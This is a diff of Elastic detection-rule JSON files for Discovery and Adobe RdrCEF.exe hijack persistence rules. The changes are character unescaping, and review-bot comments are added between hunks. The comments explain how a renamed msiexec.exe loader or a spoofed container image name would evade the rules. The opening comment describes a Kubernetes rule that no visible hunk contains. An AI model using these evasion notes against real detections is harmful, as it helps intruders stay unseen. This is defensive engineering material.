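Review bot: The false_positives guidance in the new rule file tells analysts to build exceptions on `kubernetes.audit.requestObject.spec.container.image`, while the query and required_fields use `kubernetes.audit.requestObject.spec.containers.image`, so an exception written from that sentence would target a field the rule does not reference; the same sentence also misspells the path field as `kuberenetes.audit.requestObject.spec.volumes.hostPath.path`. The exclusion inside the query is pinned to a single tag, `docker.elastic.co/beats/elastic-agent:8.4.0`, so every other Elastic Agent version deploying the daemonset the false_positives text itself describes will still alert, and because the image name comes from the same submitted pod spec as the hostPath mount, an exclusion keyed on it is a noise filter rather than a trust signal. I would drop the hard-coded image exclusion (or make it version-independent and state the limitation in false_positives) and leave suppression to the per-environment exceptions the guidance already recommends. `"note": ""` also means the rule ships without an investigation guide despite mapping to T1611 Escape to Host at risk 47. These security_rule JSON files look generated from the upstream detection-rules sources, so the corrections presumably belong there rather than in this package.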
diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_2.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_2.json
index 1da9c129a30..b643c30dc59 100644
--- a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_2.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_3.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_3.json
index 9da8b521395..579fd802323 100644
--- a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_3.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_4.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_4.json
index 5f7e5e65ba7..936b06ce14d 100644
--- a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_4.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_5.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_5.json
index 07f8146b511..1e2258496fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_5.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_104.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_104.json
index b0fe7971abf..edbf608b8aa 100644
--- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_104.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - 
$osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_105.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_105.json
index f5c8b9bbe5d..08fd15c93da 100644
--- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_105.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - 
Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE 
'%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
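Review bot: The "Osquery - Retrieve Services Running on User Accounts" query in the new `note` string filters with `user_account == null`, which in SQLite yields NULL rather than a boolean; `FALSE OR NULL` is NULL and `NOT NULL` is NULL, so as far as I can tell every row fails the WHERE clause and the query returns nothing regardless of which services run under user accounts. The predicate should read `NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account IS NULL)`. Since the unescaping of `\u003e` is the only change in this hunk, the defect is inherited from the previous version and persists in the new side. The rule object this `note` belongs to starts and ends outside the hunk.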
diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_106.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_106.json index 69dcd329dbd..dd5023ff5ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_106.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - 
Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE 
'%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
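Review bot: The `query` on the new side excludes matches with `not process.name : "msiexec.exe"`, and `process.name` is chosen by whoever drops the file: a loader copied to any writable directory as `msiexec.exe` can overwrite `RdrCEF.exe` without triggering this rule, which defeats the purpose of a persistence-hijack detection. Anchor the exclusion on where the installer actually lives, e.g. `not (process.name : "msiexec.exe" and process.executable : ("?:\\Windows\\System32\\msiexec.exe", "?:\\Windows\\SysWOW64\\msiexec.exe"))`; if the data source populates `process.code_signature.*`, requiring a trusted signature as well would be stronger, but I cannot confirm that from this file. The unescaping in this hunk does not change the rule's behavior, so this applies equally to the previous version. The surrounding JSON object starts and ends outside the hunk.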
diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_107.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_107.json index 8052cfcecf6..7145a2353b0 100644 --- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_107.json 
